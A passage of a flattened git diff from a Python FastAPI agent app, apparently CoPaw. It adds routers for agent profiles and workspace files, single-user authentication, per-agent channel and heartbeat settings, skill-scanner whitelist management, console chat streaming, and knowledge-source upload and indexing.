# Add to root config + config.agents.profiles[new_id] = agent_ref + save_config(config) + + # Save agent config to workspace + save_agent_config(new_id, agent_config) + + logger.info(f"Created new agent: {new_id} (name={request.name})") + + return agent_ref + + +@router.put( + "/{agentId}", + response_model=AgentProfileConfig, + summary="Update agent", + description="Update agent configuration and trigger reload", +) +async def update_agent( + agentId: str = PathParam(...), + agent_config: AgentProfileConfig = Body(...), + request: Request = None, +) -> AgentProfileConfig: + """Update agent configuration.""" + config = load_config() + + if agentId not in config.agents.profiles: + raise HTTPException( + status_code=404, + detail=f"Agent '{agentId}' not found", + ) + + # Ensure ID doesn't change + agent_config.id = agentId + + # Save agent configuration + save_agent_config(agentId, agent_config) + + # Trigger hot reload if agent is running (async, non-blocking) + # IMPORTANT: Get manager before creating background task to avoid + # accessing request object after its lifecycle ends + manager = _get_multi_agent_manager(request) + + async def reload_in_background(): + try: + await manager.reload_agent(agentId) + except Exception as e: + logger.warning(f"Background reload failed for {agentId}: {e}") + + asyncio.create_task(reload_in_background()) + + return agent_config + + +@router.delete( + "/{agentId}", + summary="Delete agent", + description="Delete agent and workspace (cannot delete default agent)", +) +async def delete_agent( + agentId: str = PathParam(...), + request: Request = None, +) -> dict: + """Delete an agent.""" + config = load_config() + + if agentId not in config.agents.profiles: + raise HTTPException( + status_code=404, + detail=f"Agent '{agentId}' not found", + ) + + if agentId == "default": + raise HTTPException( + status_code=400, + detail="Cannot delete the default agent", + ) + + # Stop agent instance if running + manager = _get_multi_agent_manager(request) + await manager.stop_agent(agentId) + + # Remove from config + del config.agents.profiles[agentId] + save_config(config) + + # Note: We don't delete the workspace directory for safety + # Users can manually delete it if needed + + return {"success": True, "agent_id": agentId} + + +@router.get( + "/{agentId}/files", + response_model=list[MdFileInfo], + summary="List agent workspace files", + description="List all markdown files in agent's workspace", +) +async def list_agent_files( + agentId: str = PathParam(...), + request: Request = None, +) -> list[MdFileInfo]: + """List agent workspace files.""" + manager = _get_multi_agent_manager(request) + + try: + workspace = await manager.get_agent(agentId) + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + + workspace_manager = AgentMdManager(str(workspace.workspace_dir)) + + try: + files = [ + MdFileInfo.model_validate(file) + for file in workspace_manager.list_working_mds() + ] + return files + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +@router.get( + "/{agentId}/files/{filename}", + response_model=MdFileContent, + summary="Read agent workspace file", + description="Read a markdown file from agent's workspace", +) +async def read_agent_file( + agentId: str = PathParam(...), + filename: str = PathParam(...), + request: Request = None, +) -> MdFileContent: + """Read agent workspace file.""" + manager = _get_multi_agent_manager(request) + + try: + workspace = await manager.get_agent(agentId) + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + + workspace_manager = AgentMdManager(str(workspace.workspace_dir)) + + try: + content = workspace_manager.read_working_md(filename) + return MdFileContent(content=content) + except FileNotFoundError as exc: + raise HTTPException( + status_code=404, + detail=f"File '{filename}' not found", + ) from exc + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +@router.put( + "/{agentId}/files/{filename}", + response_model=dict, + summary="Write agent workspace file", + description="Create or update a markdown file in agent's workspace", +) +async def write_agent_file( + agentId: str = PathParam(...), + filename: str = PathParam(...), + file_content: MdFileContent = Body(...), + request: Request = None, +) -> dict: + """Write agent workspace file.""" + manager = _get_multi_agent_manager(request) + + try: + workspace = await manager.get_agent(agentId) + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + + workspace_manager = AgentMdManager(str(workspace.workspace_dir)) + + try: + workspace_manager.write_working_md(filename, file_content.content) + return {"written": True, "filename": filename} + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +@router.get( + "/{agentId}/memory", + response_model=list[MdFileInfo], + summary="List agent memory files", + description="List all memory files for an agent", +) +async def list_agent_memory( + agentId: str = PathParam(...), + request: Request = None, +) -> list[MdFileInfo]: + """List agent memory files.""" + manager = _get_multi_agent_manager(request) + + try: + workspace = await manager.get_agent(agentId) + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + + workspace_manager = AgentMdManager(str(workspace.workspace_dir)) + + try: + files = [ + MdFileInfo.model_validate(file) + for file in workspace_manager.list_memory_mds() + ] + return files + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +def _initialize_agent_workspace( # pylint: disable=too-many-branches + workspace_dir: Path, + agent_config: AgentProfileConfig, # pylint: disable=unused-argument +) -> None: + """Initialize agent workspace (similar to copaw init --defaults). + + Args: + workspace_dir: Path to agent workspace + agent_config: Agent configuration (reserved for future use) + """ + import shutil + from ...config import load_config as load_global_config + + # Create essential subdirectories + (workspace_dir / "sessions").mkdir(exist_ok=True) + (workspace_dir / "memory").mkdir(exist_ok=True) + (workspace_dir / "active_skills").mkdir(exist_ok=True) + (workspace_dir / "customized_skills").mkdir(exist_ok=True) + + # Get language from global config + config = load_global_config() + language = config.agents.language or "zh" + + # Copy MD files from agents/md_files/{language}/ to workspace + md_files_dir = ( + Path(__file__).parent.parent.parent / "agents" / "md_files" / language + ) + if md_files_dir.exists(): + for md_file in md_files_dir.glob("*.md"): + target_file = workspace_dir / md_file.name + if not target_file.exists(): + try: + shutil.copy2(md_file, target_file) + except Exception as e: + logger.warning( + f"Failed to copy {md_file.name}: {e}", + ) + + # Create HEARTBEAT.md if not exists + heartbeat_file = workspace_dir / "HEARTBEAT.md" + if not heartbeat_file.exists(): + DEFAULT_HEARTBEAT_MDS = { + "zh": """# Heartbeat checklist +- 扫描收件箱紧急邮件 +- 查看未来 2h 的日历 +- 检查待办是否卡住 +- 若安静超过 8h,轻量 check-in +""", + "en": """# Heartbeat checklist +- Scan inbox for urgent email +- Check calendar for next 2h +- Check tasks for blockers +- Light check-in if quiet for 8h +""", + "ru": """# Heartbeat checklist +- Проверить входящие на срочные письма +- Просмотреть календарь на ближайшие 2 часа +- Проверить задачи на наличие блокировок +- Лёгкая проверка при отсутствии активности более 8 часов +""", + } + heartbeat_content = DEFAULT_HEARTBEAT_MDS.get( + language, + DEFAULT_HEARTBEAT_MDS["en"], + ) + with open(heartbeat_file, "w", encoding="utf-8") as f: + f.write(heartbeat_content.strip()) + + # Copy builtin skills to agent's active_skills directory + builtin_skills_dir = ( + Path(__file__).parent.parent.parent / "agents" / "skills" + ) + if builtin_skills_dir.exists(): + for skill_dir in builtin_skills_dir.iterdir(): + if skill_dir.is_dir() and (skill_dir / "SKILL.md").exists(): + target_skill_dir = ( + workspace_dir / "active_skills" / skill_dir.name + ) + if not target_skill_dir.exists(): + try: + shutil.copytree(skill_dir, target_skill_dir) + except Exception as e: + logger.warning( + f"Failed to copy skill {skill_dir.name}: {e}", + ) + + # Create empty jobs.json for cron jobs + jobs_file = workspace_dir / "jobs.json" + if not jobs_file.exists(): + with open(jobs_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "jobs": []}, + f, + ensure_ascii=False, + indent=2, + ) + + # Create empty chats.json for chat history + chats_file = workspace_dir / "chats.json" + if not chats_file.exists(): + with open(chats_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "chats": []}, + f, + ensure_ascii=False, + indent=2, + ) + + # Create empty token_usage.json + token_usage_file = workspace_dir / "token_usage.json" + if not token_usage_file.exists(): + with open(token_usage_file, "w", encoding="utf-8") as f: + f.write("[]") diff --git a/src/copaw/app/routers/auth.py b/src/copaw/app/routers/auth.py new file mode 100644 index 000000000..9fc7510d4 --- /dev/null +++ b/src/copaw/app/routers/auth.py @@ -0,0 +1,113 @@ +# -*- coding: utf-8 -*- +"""Authentication API endpoints.""" +from __future__ import annotations + +import os + +from fastapi import APIRouter, HTTPException, Request +from pydantic import BaseModel + +from ..auth import ( + authenticate, + has_registered_users, + is_auth_enabled, + register_user, + verify_token, +) + +router = APIRouter(prefix="/auth", tags=["auth"]) + + +class LoginRequest(BaseModel): + username: str + password: str + + +class LoginResponse(BaseModel): + token: str + username: str + + +class RegisterRequest(BaseModel): + username: str + password: str + + +class AuthStatusResponse(BaseModel): + enabled: bool + has_users: bool + + +@router.post("/login") +async def login(req: LoginRequest): + """Authenticate with username and password.""" + if not is_auth_enabled(): + return LoginResponse(token="", username="") + + token = authenticate(req.username, req.password) + if token is None: + raise HTTPException(status_code=401, detail="Invalid credentials") + + return LoginResponse(token=token, username=req.username) + + +@router.post("/register") +async def register(req: RegisterRequest): + """Register the single user account (only allowed once).""" + env_flag = os.environ.get("COPAW_AUTH_ENABLED", "").strip().lower() + if env_flag not in ("true", "1", "yes"): + raise HTTPException( + status_code=403, + detail="Authentication is not enabled", + ) + + if has_registered_users(): + raise HTTPException( + status_code=403, + detail="User already registered", + ) + + if not req.username.strip() or not req.password.strip(): + raise HTTPException( + status_code=400, + detail="Username and password are required", + ) + + token = register_user(req.username.strip(), req.password) + if token is None: + raise HTTPException( + status_code=409, + detail="Registration failed", + ) + + return LoginResponse(token=token, username=req.username.strip()) + + +@router.get("/status") +async def auth_status(): + """Check if authentication is enabled and whether a user exists.""" + return AuthStatusResponse( + enabled=is_auth_enabled(), + has_users=has_registered_users(), + ) + + +@router.get("/verify") +async def verify(request: Request): + """Verify that the caller's Bearer token is still valid.""" + if not is_auth_enabled(): + return {"valid": True, "username": ""} + + auth_header = request.headers.get("Authorization", "") + token = auth_header[7:] if auth_header.startswith("Bearer ") else "" + if not token: + raise HTTPException(status_code=401, detail="No token provided") + + username = verify_token(token) + if username is None: + raise HTTPException( + status_code=401, + detail="Invalid or expired token", + ) + + return {"valid": True, "username": username} diff --git a/src/copaw/app/routers/config.py b/src/copaw/app/routers/config.py index 2a2ff3c07..81f49b6aa 100644 --- a/src/copaw/app/routers/config.py +++ b/src/copaw/app/routers/config.py @@ -1,13 +1,14 @@ # -*- coding: utf-8 -*- +from datetime import datetime, timezone from typing import Any, List from fastapi import APIRouter, Body, HTTPException, Path, Request +from pydantic import BaseModel from ...config import ( load_config, save_config, - get_heartbeat_config, ChannelConfig, ChannelConfigUnion, get_available_channels, @@ -27,6 +28,8 @@ MattermostConfig, MQTTConfig, QQConfig, + SkillScannerConfig, + SkillScannerWhitelistEntry, TelegramConfig, VoiceChannelConfig, ) @@ -56,15 +59,23 @@ summary="List all channels", description="Retrieve configuration for all available channels", ) -async def list_channels() -> dict: +async def list_channels(request: Request) -> dict: """List all channel configs (filtered by available channels).""" - config = load_config() + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + agent_config = agent.config available = get_available_channels() - # Get all channel configs from model_dump and __pydantic_extra__ - all_configs = config.channels.model_dump() - extra = getattr(config.channels, "__pydantic_extra__", None) or {} - all_configs.update(extra) + # Get channel configs from agent's config (with fallback to empty) + channels_config = agent_config.channels + if channels_config is None: + # No channels config yet, use empty defaults + all_configs = {} + else: + all_configs = channels_config.model_dump() + extra = getattr(channels_config, "__pydantic_extra__", None) or {} + all_configs.update(extra) # Return all available channels (use default config if not saved) result = {} @@ -102,15 +113,40 @@ async def list_channel_types() -> List[str]: description="Update configuration for all channels at once", ) async def put_channels( + request: Request, channels_config: ChannelConfig = Body( ..., description="Complete channel configuration", ), ) -> ChannelConfig: """Update all channel configs.""" - config = load_config() - config.channels = channels_config - save_config(config) + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + + agent = await get_agent_for_request(request) + agent.config.channels = channels_config + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return channels_config @@ -121,6 +157,7 @@ async def put_channels( description="Retrieve configuration for a specific channel by name", ) async def get_channel( + request: Request, channel_name: str = Path( ..., description="Name of the channel to retrieve", @@ -128,16 +165,26 @@ async def get_channel( ), ) -> ChannelConfigUnion: """Get a specific channel config by name.""" + from ..agent_context import get_agent_for_request + available = get_available_channels() if channel_name not in available: raise HTTPException( status_code=404, detail=f"Channel '{channel_name}' not found", ) - config = load_config() - single_channel_config = getattr(config.channels, channel_name, None) + + agent = await get_agent_for_request(request) + channels = agent.config.channels + if channels is None: + raise HTTPException( + status_code=404, + detail=f"Channel '{channel_name}' not configured", + ) + + single_channel_config = getattr(channels, channel_name, None) if single_channel_config is None: - extra = getattr(config.channels, "__pydantic_extra__", None) or {} + extra = getattr(channels, "__pydantic_extra__", None) or {} single_channel_config = extra.get(channel_name) if single_channel_config is None: raise HTTPException( @@ -154,6 +201,7 @@ async def get_channel( description="Update configuration for a specific channel by name", ) async def put_channel( + request: Request, channel_name: str = Path( ..., description="Name of the channel to update", @@ -165,13 +213,21 @@ async def put_channel( ), ) -> ChannelConfigUnion: """Update a specific channel config by name.""" + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + available = get_available_channels() if channel_name not in available: raise HTTPException( status_code=404, detail=f"Channel '{channel_name}' not found", ) - config = load_config() + + agent = await get_agent_for_request(request) + + # Initialize channels if not exists + if agent.config.channels is None: + agent.config.channels = ChannelConfig() config_class = _CHANNEL_CONFIG_CLASS_MAP.get(channel_name) if config_class is not None: @@ -180,9 +236,30 @@ async def put_channel( # For custom channels, just use the dict channel_config = single_channel_config - # Allow setting extra (plugin) channel config - setattr(config.channels, channel_name, channel_config) - save_config(config) + # Set channel config in agent's config + setattr(agent.config.channels, channel_name, channel_config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return channel_config @@ -191,9 +268,16 @@ async def put_channel( summary="Get heartbeat config", description="Return current heartbeat config (interval, target, etc.)", ) -async def get_heartbeat() -> Any: +async def get_heartbeat(request: Request) -> Any: """Return effective heartbeat config (from file or default).""" - hb = get_heartbeat_config() + from ..agent_context import get_agent_for_request + from ...config.config import HeartbeatConfig as HeartbeatConfigModel + + agent = await get_agent_for_request(request) + hb = agent.config.heartbeat + if hb is None: + # Use default if not configured + hb = HeartbeatConfigModel() return hb.model_dump(mode="json", by_alias=True) @@ -207,19 +291,34 @@ async def put_heartbeat( body: HeartbeatBody = Body(..., description="Heartbeat configuration"), ) -> Any: """Update heartbeat config and reschedule the heartbeat job.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + + agent = await get_agent_for_request(request) hb = HeartbeatConfig( enabled=body.enabled, every=body.every, target=body.target, active_hours=body.active_hours, ) - config.agents.defaults.heartbeat = hb - save_config(config) + agent.config.heartbeat = hb + save_agent_config(agent.agent_id, agent.config) + + # Reschedule heartbeat (async, non-blocking) + import asyncio - cron_manager = getattr(request.app.state, "cron_manager", None) - if cron_manager is not None: - await cron_manager.reschedule_heartbeat() + async def reschedule_in_background(): + try: + if agent.cron_manager is not None: + await agent.cron_manager.reschedule_heartbeat() + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reschedule failed: {e}", + ) + + asyncio.create_task(reschedule_in_background()) return hb.model_dump(mode="json", by_alias=True) @@ -248,6 +347,36 @@ async def put_agents_llm_routing( return body +# ── User Timezone ──────────────────────────────────────────────────── + + +@router.get( + "/user-timezone", + summary="Get user timezone", + description="Return the configured user IANA timezone", +) +async def get_user_timezone() -> dict: + config = load_config() + return {"timezone": config.user_timezone} + + +@router.put( + "/user-timezone", + summary="Update user timezone", + description="Set the user IANA timezone", +) +async def put_user_timezone( + body: dict = Body(..., description="Body with 'timezone' key"), +) -> dict: + tz = body.get("timezone", "").strip() + if not tz: + raise HTTPException(status_code=400, detail="timezone is required") + config = load_config() + config.user_timezone = tz + save_config(config) + return {"timezone": tz} + + # ── Security / Tool Guard ──────────────────────────────────────────── @@ -307,3 +436,127 @@ async def get_builtin_rules() -> List[ToolGuardRuleConfig]: ) for r in rules ] + + +# ── Security / Skill Scanner ──────────────────────────────────────── + + +@router.get( + "/security/skill-scanner", + response_model=SkillScannerConfig, + summary="Get skill scanner settings", +) +async def get_skill_scanner() -> SkillScannerConfig: + config = load_config() + return config.security.skill_scanner + + +@router.put( + "/security/skill-scanner", + response_model=SkillScannerConfig, + summary="Update skill scanner settings", +) +async def put_skill_scanner( + body: SkillScannerConfig = Body(...), +) -> SkillScannerConfig: + config = load_config() + config.security.skill_scanner = body + save_config(config) + return body + + +@router.get( + "/security/skill-scanner/blocked-history", + summary="Get blocked skills history", +) +async def get_blocked_history() -> list: + from ...security.skill_scanner import get_blocked_history as _get_history + + records = _get_history() + return [r.to_dict() for r in records] + + +@router.delete( + "/security/skill-scanner/blocked-history", + summary="Clear all blocked skills history", +) +async def delete_blocked_history() -> dict: + from ...security.skill_scanner import clear_blocked_history + + clear_blocked_history() + return {"cleared": True} + + +@router.delete( + "/security/skill-scanner/blocked-history/{index}", + summary="Remove a single blocked history entry", +) +async def delete_blocked_entry( + index: int = Path(..., ge=0), +) -> dict: + from ...security.skill_scanner import remove_blocked_entry + + ok = remove_blocked_entry(index) + if not ok: + raise HTTPException(status_code=404, detail="Entry not found") + return {"removed": True} + + +class WhitelistAddRequest(BaseModel): + skill_name: str + content_hash: str = "" + + +@router.post( + "/security/skill-scanner/whitelist", + summary="Add a skill to the whitelist", +) +async def add_to_whitelist( + body: WhitelistAddRequest = Body(...), +) -> dict: + skill_name = body.skill_name.strip() + content_hash = body.content_hash + if not skill_name: + raise HTTPException(status_code=400, detail="skill_name is required") + + config = load_config() + scanner_cfg = config.security.skill_scanner + + for entry in scanner_cfg.whitelist: + if entry.skill_name == skill_name: + raise HTTPException( + status_code=409, + detail=f"Skill '{skill_name}' is already whitelisted", + ) + + scanner_cfg.whitelist.append( + SkillScannerWhitelistEntry( + skill_name=skill_name, + content_hash=content_hash, + added_at=datetime.now(timezone.utc).isoformat(), + ), + ) + save_config(config) + return {"whitelisted": True, "skill_name": skill_name} + + +@router.delete( + "/security/skill-scanner/whitelist/{skill_name}", + summary="Remove a skill from the whitelist", +) +async def remove_from_whitelist( + skill_name: str = Path(..., min_length=1), +) -> dict: + config = load_config() + scanner_cfg = config.security.skill_scanner + original_len = len(scanner_cfg.whitelist) + scanner_cfg.whitelist = [ + e for e in scanner_cfg.whitelist if e.skill_name != skill_name + ] + if len(scanner_cfg.whitelist) == original_len: + raise HTTPException( + status_code=404, + detail=f"Skill '{skill_name}' not found in whitelist", + ) + save_config(config) + return {"removed": True, "skill_name": skill_name} diff --git a/src/copaw/app/routers/console.py b/src/copaw/app/routers/console.py index c44883f97..fc3c02748 100644 --- a/src/copaw/app/routers/console.py +++ b/src/copaw/app/routers/console.py @@ -1,12 +1,153 @@ # -*- coding: utf-8 -*- -"""Console APIs for push messages.""" +"""Console APIs: push messages and chat.""" +from __future__ import annotations -from fastapi import APIRouter, Query +import json +import logging +from typing import AsyncGenerator, Union +from fastapi import APIRouter, HTTPException, Query, Request +from starlette.responses import StreamingResponse + +from agentscope_runtime.engine.schemas.agent_schemas import AgentRequest +from ..agent_context import get_agent_for_request + +logger = logging.getLogger(__name__) router = APIRouter(prefix="/console", tags=["console"]) +def _extract_session_and_payload(request_data: Union[AgentRequest, dict]): + """Extract run_key (ChatSpec.id), session_id, and native payload. + + run_key must be ChatSpec.id (chat_id) so it matches list_chats/get_chat. + """ + if isinstance(request_data, AgentRequest): + channel_id = request_data.channel or "console" + sender_id = request_data.user_id or "default" + session_id = request_data.session_id or "default" + content_parts = ( + list(request_data.input[0].content) if request_data.input else [] + ) + else: + channel_id = request_data.get("channel", "console") + sender_id = request_data.get("user_id", "default") + session_id = request_data.get("session_id", "default") + input_data = request_data.get("input", []) + content_parts = [] + for content_part in input_data: + if hasattr(content_part, "content"): + content_parts.extend(list(content_part.content or [])) + elif isinstance(content_part, dict) and "content" in content_part: + content_parts.extend(content_part["content"] or []) + + native_payload = { + "channel_id": channel_id, + "sender_id": sender_id, + "content_parts": content_parts, + "meta": { + "session_id": session_id, + "user_id": sender_id, + }, + } + return native_payload + + +@router.post( + "/chat", + status_code=200, + summary="Chat with console (streaming response)", + description="Agent API Request Format. See runtime.agentscope.io. " + "Use body.reconnect=true to attach to a running stream.", +) +async def post_console_chat( + request_data: Union[AgentRequest, dict], + request: Request, +) -> StreamingResponse: + """Stream agent response. Run continues in background after disconnect. + Stop via POST /console/chat/stop. Reconnect with body.reconnect=true. + """ + workspace = await get_agent_for_request(request) + console_channel = await workspace.channel_manager.get_channel("console") + if console_channel is None: + raise HTTPException( + status_code=503, + detail="Channel Console not found", + ) + try: + native_payload = _extract_session_and_payload(request_data) + except ValueError as e: + raise HTTPException(status_code=400, detail=str(e)) from e + session_id = console_channel.resolve_session_id( + sender_id=native_payload["sender_id"], + channel_meta=native_payload["meta"], + ) + name = "New Chat" + if len(native_payload["content_parts"]) > 0: + content = native_payload["content_parts"][0] + if content: + name = content.text[:10] + else: + name = "Media Message" + chat = await workspace.chat_manager.get_or_create_chat( + session_id, + native_payload["sender_id"], + native_payload["channel_id"], + name=name, + ) + tracker = workspace.task_tracker + + is_reconnect = False + if isinstance(request_data, dict): + is_reconnect = request_data.get("reconnect") is True + + if is_reconnect: + queue = await tracker.attach(chat.id) + if queue is None: + raise HTTPException( + status_code=404, + detail="No running chat for this session", + ) + else: + queue, _ = await tracker.attach_or_start( + chat.id, + native_payload, + console_channel.stream_one, + ) + + async def event_generator() -> AsyncGenerator[str, None]: + try: + async for event_data in tracker.stream_from_queue(queue): + yield event_data + except Exception as e: + logger.exception("Console chat stream error") + yield f"data: {json.dumps({'error': str(e)})}\n\n" + + return StreamingResponse( + event_generator(), + media_type="text/event-stream", + headers={ + "Cache-Control": "no-cache", + "Connection": "keep-alive", + }, + ) + + +@router.post( + "/chat/stop", + status_code=200, + summary="Stop running console chat", +) +async def post_console_chat_stop( + request: Request, + chat_id: str = Query(..., description="Chat id (ChatSpec.id) to stop"), +) -> dict: + """Stop the running chat. Only stops when called.""" + workspace = await get_agent_for_request(request) + stopped = await workspace.task_tracker.request_stop(chat_id) + return {"stopped": stopped} + + @router.get("/push-messages") async def get_push_messages( session_id: str | None = Query(None, description="Optional session id"), diff --git a/src/copaw/app/routers/knowledge.py b/src/copaw/app/routers/knowledge.py new file mode 100644 index 000000000..0fdb7f728 --- /dev/null +++ b/src/copaw/app/routers/knowledge.py @@ -0,0 +1,471 @@ +# -*- coding: utf-8 -*- + +from __future__ import annotations + +import asyncio +import io +import json +import shutil +import tempfile +import zipfile +from datetime import datetime, timezone +from pathlib import Path +from typing import Optional +from types import SimpleNamespace + +from fastapi import APIRouter, Body, File, Form, HTTPException, Query, UploadFile, WebSocket, WebSocketDisconnect +from fastapi.responses import StreamingResponse + +from ...config import load_config, save_config +from ...config.config import KnowledgeConfig, KnowledgeSourceSpec +from ...constant import WORKING_DIR +from ...knowledge import GraphOpsManager, KnowledgeManager +from ...knowledge.module_skills import sync_knowledge_module_skills + +router = APIRouter(prefix="/knowledge", tags=["knowledge"]) + + +def _knowledge_runtime_enabled(config) -> bool: + running = getattr(getattr(config, "agents", None), "running", None) + return bool(getattr(running, "knowledge_enabled", True)) + + +def _knowledge_effective_enabled(config) -> bool: + return _knowledge_runtime_enabled(config) and bool( + getattr(getattr(config, "knowledge", None), "enabled", False) + ) + + +def _ensure_knowledge_enabled(config) -> None: + if not _knowledge_effective_enabled(config): + raise HTTPException(status_code=400, detail="KNOWLEDGE_DISABLED") + + +def _zip_path(path) -> io.BytesIO: + buf = io.BytesIO() + with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf: + for entry in sorted(path.rglob("*")): + arcname = entry.relative_to(path).as_posix() + if entry.is_file(): + zf.write(entry, arcname) + elif entry.is_dir(): + zf.write(entry, arcname + "/") + buf.seek(0) + return buf + + +def _validate_zip_data(data: bytes) -> None: + if not zipfile.is_zipfile(io.BytesIO(data)): + raise HTTPException( + status_code=400, + detail="Uploaded file is not a valid zip archive", + ) + with zipfile.ZipFile(io.BytesIO(data)) as zf: + for name in zf.namelist(): + p = Path(name) + if p.is_absolute() or ".." in p.parts: + raise HTTPException( + status_code=400, + detail=f"Zip contains unsafe path: {name}", + ) + + +def _extract_zip_to_temp(data: bytes) -> Path: + tmp_dir = Path(tempfile.mkdtemp(prefix="copaw_knowledge_import_")) + with zipfile.ZipFile(io.BytesIO(data)) as zf: + zf.extractall(tmp_dir) + return tmp_dir + + +def _detect_extract_root(tmp_dir: Path) -> Path: + entries = [entry for entry in tmp_dir.iterdir() if not entry.name.startswith(".__")] + if len(entries) == 1 and entries[0].is_dir() and (entries[0] / "sources").exists(): + return entries[0] + return tmp_dir + + +def _clamp_int(value: str | None, default: int, minimum: int, maximum: int) -> int: + try: + parsed = int((value or "").strip()) + except (TypeError, ValueError): + parsed = default + return max(minimum, min(maximum, parsed)) + + +def _manager() -> KnowledgeManager: + return KnowledgeManager(WORKING_DIR) + + +def _find_source(config: KnowledgeConfig, source_id: str) -> Optional[KnowledgeSourceSpec]: + for source in config.sources: + if source.id == source_id: + return source + return None + + +@router.get("/config", response_model=KnowledgeConfig) +async def get_knowledge_config() -> KnowledgeConfig: + return load_config().knowledge + + +@router.put("/config", response_model=KnowledgeConfig) +async def put_knowledge_config( + knowledge_config: KnowledgeConfig = Body(...), +) -> KnowledgeConfig: + config = load_config() + previous_enabled = bool(getattr(config.agents.running, "knowledge_enabled", True)) + config.knowledge = knowledge_config + config.agents.running.knowledge_enabled = knowledge_config.enabled + if previous_enabled != knowledge_config.enabled: + sync_knowledge_module_skills(knowledge_config.enabled) + save_config(config) + return config.knowledge + + +@router.get("/sources") +async def list_sources(): + config = load_config() + return { + "enabled": _knowledge_effective_enabled(config), + "sources": _manager().list_sources(config.knowledge), + } + + +@router.put("/sources", response_model=KnowledgeSourceSpec) +async def upsert_source( + source: KnowledgeSourceSpec = Body(...), +) -> KnowledgeSourceSpec: + config = load_config() + _ensure_knowledge_enabled(config) + manager = _manager() + source = manager.normalize_source_name(source, config.knowledge) + existing = _find_source(config.knowledge, source.id) + if existing is None: + config.knowledge.sources.append(source) + else: + index = config.knowledge.sources.index(existing) + config.knowledge.sources[index] = source + save_config(config) + return source + + +@router.post("/upload/file") +async def upload_knowledge_file( + source_id: str = Form(...), + file: UploadFile = File(...), +): + data = await file.read() + if not data: + raise HTTPException(status_code=400, detail="Uploaded file is empty") + saved_path = _manager().save_uploaded_file( + source_id=source_id, + filename=file.filename or "knowledge-upload", + data=data, + ) + return { + "location": str(saved_path), + "filename": saved_path.name, + } + + +@router.post("/upload/directory") +async def upload_knowledge_directory( + source_id: str = Form(...), + relative_paths: list[str] = Form(...), + files: list[UploadFile] = File(...), +): + if len(files) != len(relative_paths): + raise HTTPException( + status_code=400, + detail="files and relative_paths length mismatch", + ) + saved_pairs = [] + for relative_path, upload in zip(relative_paths, files): + saved_pairs.append((relative_path, await upload.read())) + saved_root = _manager().save_uploaded_directory(source_id, saved_pairs) + return { + "location": str(saved_root), + "file_count": len(saved_pairs), + } + + +@router.delete("/sources/{source_id}") +async def delete_source(source_id: str): + config = load_config() + _ensure_knowledge_enabled(config) + source = _find_source(config.knowledge, source_id) + if source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + config.knowledge.sources = [ + item for item in config.knowledge.sources if item.id != source_id + ] + save_config(config) + _manager().delete_index(source_id) + return {"deleted": True, "source_id": source_id} + + +@router.delete("/clear") +async def clear_knowledge( + confirm: bool = Query(default=False), + remove_sources: bool = Query(default=True), +): + """Clear all persisted knowledge data and optionally remove source configs.""" + if not confirm: + raise HTTPException(status_code=400, detail="KNOWLEDGE_CLEAR_CONFIRM_REQUIRED") + + config = load_config() + _ensure_knowledge_enabled(config) + result = _manager().clear_knowledge( + config.knowledge, + remove_sources=remove_sources, + ) + save_config(config) + return result + + +@router.post("/sources/{source_id}/index") +async def index_source(source_id: str): + config = load_config() + _ensure_knowledge_enabled(config) + source = _find_source(config.knowledge, source_id) + if source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + try: + result = _manager().index_source( + source, + config.knowledge, + config.agents.running, + ) + except (FileNotFoundError, ValueError, OSError) as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except Exception as exc: + raise HTTPException(status_code=502, detail=str(exc)) from exc + return result + + +@router.get("/sources/{source_id}/content") +async def get_source_content(source_id: str): + config = load_config() + source = _find_source(config.knowledge, source_id) + if source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + return _manager().get_source_documents(source_id) + + +@router.post("/index") +async def index_all_sources(): + config = load_config() + _ensure_knowledge_enabled(config) + try: + return _manager().index_all(config.knowledge, config.agents.running) + except (FileNotFoundError, ValueError, OSError) as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except Exception as exc: + raise HTTPException(status_code=502, detail=str(exc)) from exc + + +@router.get("/search") +async def search_knowledge( + q: str = Query(..., min_length=1), + limit: int = Query(default=10, ge=1, le=50), + source_ids: Optional[str] = Query(default=None), + source_types: Optional[str] = Query(default=None), +): + config = load_config() + _ensure_knowledge_enabled(config) + ids = [item for item in (source_ids or "").split(",") if item] + types = [item for item in (source_types or "").split(",") if item] + return _manager().search( + query=q, + config=config.knowledge, + limit=limit, + source_ids=ids or None, + source_types=types or None, + ) + + +@router.get("/history-backfill/status") +async def get_history_backfill_status(): + """Get history backfill status for knowledge enable flow and CTA display.""" + 